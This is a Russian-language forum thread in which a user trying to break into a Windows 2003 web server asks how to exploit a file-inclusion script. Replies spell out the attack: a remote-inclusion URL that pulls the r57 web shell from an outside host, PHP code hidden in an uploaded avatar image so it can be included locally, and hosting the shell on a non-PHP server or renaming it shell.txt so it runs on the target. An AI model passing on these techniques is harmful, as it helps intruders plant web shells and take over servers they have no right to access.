Нашел на сервере скрипт, позволяющий просматривать любые файлы на сервере и инклудить php скрипты. Попытался инклудить r57 шелл с сайта на fatal.ru, но почему-то не получилось. На сервере стоит Windows 2003 server. Не подскажете что можно в данном случае сделать?
значит плохо пытался, пытайся лучше, р57 ничем не хуже других пхп, и вообще если у тя не получаеца залить, с чего ты взял что вообще можно пхп инк делать?
Ну если позволяет инклудить это очень хорошо. Кстати, не приходило в голову что инклуд может быть локальным, позтому конструкция http://site.ru/file=http://othersite.ru/r57.php не работает. Залей php шелл на тот сервис, можт там есть форум или можно подгружать файлы.
Constantine дело говорит, просто иногда перед тем как инклудить скрипт или файл, сначала проверяют его существование, поэтому инклудить можно только локально... если есть на сайте форум и можно грузить аватары с компа, то берёшь картинку открываешь в блокноте и в конец добавляешь пхп код, грузишь и инклудишь - вуаля. правда не везде покатит, но как вариант
Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?
2 Dark_G видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть
Если редирект, то только из фрейма. Но все равно с этого ведь можно что-то поиметь! Просмотр файлов, как никак.
не догадываешь почему? это потому что тот хост, где у тебя пхп скрипт, поддерживает пхп скрипты.А ты инклудишь его лол..надо хостинг, который не поддерживает пхп
Да)))) Бывает и такое, инклудить пытаются, а он еще на твоем серваке выполняется) Возьми сервак без поддержки пхп )
Извращенцы вы все. просто переименовать в shell.txt не проше? инклуду как-то пофиг на расширение, а серверу нет.
=) Ну нужно же погонять человека, пусть знает где хостинги брать) А до переименования и сам мог бы додуматься, это вытекает из всего вышесказанного=/
